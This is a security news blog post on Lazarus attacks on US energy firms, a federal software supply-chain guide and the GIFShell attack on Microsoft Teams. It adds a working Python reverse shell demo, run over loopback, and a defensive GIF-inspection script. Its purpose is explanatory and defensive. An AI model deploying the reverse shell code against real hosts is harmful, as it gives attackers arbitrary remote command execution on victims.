Imran Virani, Sep 13, 2022, 3 min read

Security Impurities: News of the Week (September 7th - 13th)

Kore-Oh My: North Korea Takes Aim at US Energy Critical Infrastructure

In the latest phase of North Korea's ongoing cyber campaign, the state-backed Advanced Persistent Threat (APT) group Lazarus has targeted the corporate networks of US energy suppliers. The intrusions, which ran from February to July of this year, gained initial access by exploiting internet-exposed VMware Horizon servers (a virtual desktop platform, in this case through the Log4j vulnerability in the Horizon installation). Once inside, Lazarus deployed custom malware families and a remote access trojan (RAT) known as MagicRAT to maintain access and steal data from compromised devices. The group is best known for stealing sensitive data and for ransomware, but its motive here (beyond money) appears to be espionage: using the stolen information to build up North Korea's own energy sector capabilities. US energy operators may take some relief from these intrusions being fact-finding rather than destructive, but they still show how exposed US critical infrastructure remains, and that an unpatched, internet-facing server is all the foothold a state actor needs.

Fed-al to the Meddle: US Governmental Agencies Offer Cybersecurity Guidance for Securing Supply Chains

With government intervention and oversight in cybersecurity on the rise, a group of US security agencies has released a guide to securing software supply chains. Earlier this month, the NSA, CISA, and the Office of the Director of National Intelligence (ODNI) published Securing the Software Supply Chain: Recommended Practices Guide for Developers, released through the Enduring Security Framework (ESF).

What is the ESF?

The NSA describes the ESF as a "public-private cross-sector working group led by NSA and CISA that provides cybersecurity guidance addressing high priority threats to the nation’s critical infrastructure."

The Significance of this Guide

Securing the software supply chain is a critical part of any tech organization's security program, and each company's supply chain (its dependencies, build pipeline, and distribution path) brings its own challenges and complexities. The guide recommends practices developers can use to improve supply chain security, and it is written to apply across many scenarios, so that teams can adapt and incorporate its recommendations into their own secure software development lifecycle (secure SDLC). By describing common threat scenarios and offering recommendations flexible enough to fit the security frameworks of very different organizations, the guide is a welcome example of federal oversight in the private tech sector.

Beware of Geeks Bearing GIFts: Reverse Shell Attack Targets Microsoft Teams

The idea of GIFs being used to carry out malware attacks may sound like something from the Tech section of The Onion, but a recently disclosed reverse shell technique targeting Microsoft Teams shows that the prospect is both very real and no laughing matter.

What is a Reverse Shell?

A reverse shell is a remote command shell in which the compromised machine initiates the connection outward to a listener the attacker controls, rather than the attacker connecting inbound. Most firewalls block unsolicited inbound connections but allow outbound ones, so the callback passes through looking like ordinary client traffic. The payload that opens the shell is usually delivered by spam, phishing emails, or malicious websites; once it runs on the user's computer it calls out to the attacker's command-and-control server, and from then on the attacker can run commands on the victim with that user's privileges.
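As an added illustration (not part of the original post), here is a reverse shell reduced to its essentials and run entirely over loopback so that both sides live in one process. The loopback address, the ephemeral listener port, and the `echo` commands are made up for the demo; the point it shows is the direction of the connection: the victim dials out, the attacker only listens.

```python
# Added example (not from the original post): a minimal reverse shell over
# loopback. The victim side dials OUT to the attacker's listener; the attacker
# then pushes commands down that connection and reads the output back.
# Messages are length-prefixed so output of any size (including empty output)
# is framed unambiguously. Demo only: no encryption, no persistence, both
# sides run in one process.
import socket
import struct
import subprocess
import threading


def send_msg(sock, payload):
    """Send one length-prefixed message (4-byte big-endian length)."""
    sock.sendall(struct.pack(">I", len(payload)) + payload)


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:            # peer closed the socket
            return buf
        buf += chunk
    return buf


def recv_msg(sock):
    """Receive one length-prefixed message; returns b'' on a closed socket."""
    header = _recv_exact(sock, 4)
    if len(header) < 4:
        return b""
    (length,) = struct.unpack(">I", header)
    return _recv_exact(sock, length)


def victim(attacker_host, attacker_port):
    """Compromised host: connect outbound, then run whatever arrives."""
    with socket.create_connection((attacker_host, attacker_port), timeout=10) as s:
        while True:
            cmd = recv_msg(s).decode(errors="replace")
            if not cmd or cmd == "exit":
                break
            try:
                # shell=True is the whole point: arbitrary command execution
                proc = subprocess.run(cmd, shell=True, capture_output=True, timeout=10)
                send_msg(s, proc.stdout + proc.stderr)
            except subprocess.TimeoutExpired:
                send_msg(s, b"[timeout]")


def attacker(commands):
    """Attacker side: listen, accept the victim's callback, drive the shell.

    Returns the output of each command as a list of strings."""
    outputs = []
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.bind(("127.0.0.1", 0))      # loopback, ephemeral port (demo assumption)
        srv.listen(1)
        srv.settimeout(10)
        port = srv.getsockname()[1]
        # In a real attack the victim is another machine; here it is a thread.
        t = threading.Thread(target=victim, args=("127.0.0.1", port), daemon=True)
        t.start()
        conn, _ = srv.accept()          # the only inbound side is the attacker's
        with conn:
            conn.settimeout(10)
            for cmd in commands:
                send_msg(conn, cmd.encode())
                outputs.append(conn and recv_msg(conn).decode(errors="replace"))
            send_msg(conn, b"exit")
        t.join(5)
    return outputs


if __name__ == "__main__":
    for line in attacker(["echo reverse-shell-demo"]):
        print(line.strip())
```

Defensively, the lesson is the mirror image of the code: because the victim's traffic is outbound, perimeter rules that only block inbound connections do nothing here. Egress filtering, and alerting when an Office or chat client spawns a shell or an unexpected network connection, are the controls that catch this pattern.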

The GIFShell Attack

The new attack, known as "GIFShell", chains several weaknesses in Teams and turns Microsoft's own infrastructure into a covert channel by carrying commands inside GIFs. After getting past Teams' security controls, the attacker convinces the target to install a stager, a small program that executes commands and returns their output, and then sends GIFs that carry the commands. Because Teams accepts GIFs (rendered through HTML) but does not inspect their byte content for malware, the attacker can complete the attack with images that look harmless and traffic that looks like normal Teams activity. GIFShell is new and complex, and Microsoft appears to regard it as a low-severity issue that it is in no rush to fix with a patch to Teams, but it shows that any communication channel on the internet can be abused, and attackers are always willing to find such abuses.
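The paragraph's key point is that Teams does not look at the bytes of a GIF. As an added example (not from the original post and not the GIFShell research's own code), here is the kind of structural check a defender could run on an image: it walks the GIF89a block grammar and reports anything that is not pixel data, such as a comment extension holding base64 text or bytes appended after the trailer. Where a real attack hides its commands is an assumption in this example; the `build_gif()` helper just constructs test images with payload in those two places.

```python
# Added example (not from the original post or the GIFShell research):
# a structural scan of GIF bytes. Comment extensions and post-trailer data are
# ASSUMED hiding places for demonstration, not GIFShell's actual layout.
import base64
import struct

# Smallest valid 1x1 GIF89a, used as the carrier for the constructed samples.
_HEADER = b"GIF89a" + struct.pack("<HHBBB", 1, 1, 0x80, 0, 0) + b"\x00\x00\x00\xff\xff\xff"
_IMAGE = b"\x2c" + struct.pack("<HHHHB", 0, 0, 1, 1, 0) + b"\x02\x02\x44\x01\x00"
_TRAILER = b"\x3b"


def _sub_blocks(payload):
    """Encode payload as GIF data sub-blocks (<=255 bytes each, 0 terminates)."""
    chunks = [payload[i:i + 255] for i in range(0, len(payload), 255)]
    return b"".join(bytes([len(c)]) + c for c in chunks) + b"\x00"


def build_gif(comment=b"", trailing=b""):
    """Constructed sample: a 1x1 GIF with optional comment and post-trailer data."""
    body = _HEADER
    if comment:
        body += b"\x21\xfe" + _sub_blocks(comment)   # comment extension
    return body + _IMAGE + _TRAILER + trailing


def _read_sub_blocks(data, pos):
    chunks = []
    while True:
        n = data[pos]
        pos += 1
        if n == 0:
            return b"".join(chunks), pos
        chunks.append(data[pos:pos + n])
        pos += n


def inspect_gif(data):
    """Walk the block structure; return what was found outside pixel data."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    pos = 6
    _, _, packed, _, _ = struct.unpack_from("<HHBBB", data, pos)
    pos += 7
    if packed & 0x80:                       # global colour table: 3 * 2^(N+1) bytes
        pos += 3 * (2 << (packed & 7))
    found = {"images": 0, "comments": [], "trailing": b"", "truncated": True}
    while pos < len(data):
        block = data[pos]
        pos += 1
        if block == 0x3B:                   # trailer: anything after it is foreign
            found["trailing"] = data[pos:]
            found["truncated"] = False
            break
        if block == 0x2C:                   # image descriptor
            _, _, _, _, ipacked = struct.unpack_from("<HHHHB", data, pos)
            pos += 9
            if ipacked & 0x80:              # local colour table
                pos += 3 * (2 << (ipacked & 7))
            pos += 1                        # LZW minimum code size
            _, pos = _read_sub_blocks(data, pos)
            found["images"] += 1
        elif block == 0x21:                 # extension block
            label = data[pos]
            pos += 1
            payload, pos = _read_sub_blocks(data, pos)
            if label == 0xFE:               # comment extension
                found["comments"].append(payload)
        else:
            raise ValueError(f"unknown block 0x{block:02x} at offset {pos - 1}")
    return found


def _looks_base64(blob):
    try:
        return len(blob) >= 4 and len(base64.b64decode(blob, validate=True)) > 0
    except ValueError:                      # binascii.Error is a ValueError
        return False


def flag_gif(data):
    """Reasons this GIF deserves a second look; an empty list means none found."""
    found = inspect_gif(data)
    reasons = []
    for c in found["comments"]:
        if _looks_base64(c):
            reasons.append(f"comment extension holds base64-decodable text ({len(c)} bytes)")
    if found["trailing"]:
        reasons.append(f"{len(found['trailing'])} bytes after the GIF trailer")
    if found["truncated"]:
        reasons.append("no trailer: truncated or malformed GIF")
    return reasons


if __name__ == "__main__":
    print(flag_gif(build_gif()))                                   # clean
    print(flag_gif(build_gif(comment=base64.b64encode(b"whoami"))))
```

A check like this only catches crude embedding. A command can just as well be hidden in the pixel data itself, which is valid image content this scan never questions, so the durable control is on the endpoint: a stager that reads Teams logs and spawns shells is visible to process and file monitoring regardless of how the instructions arrived.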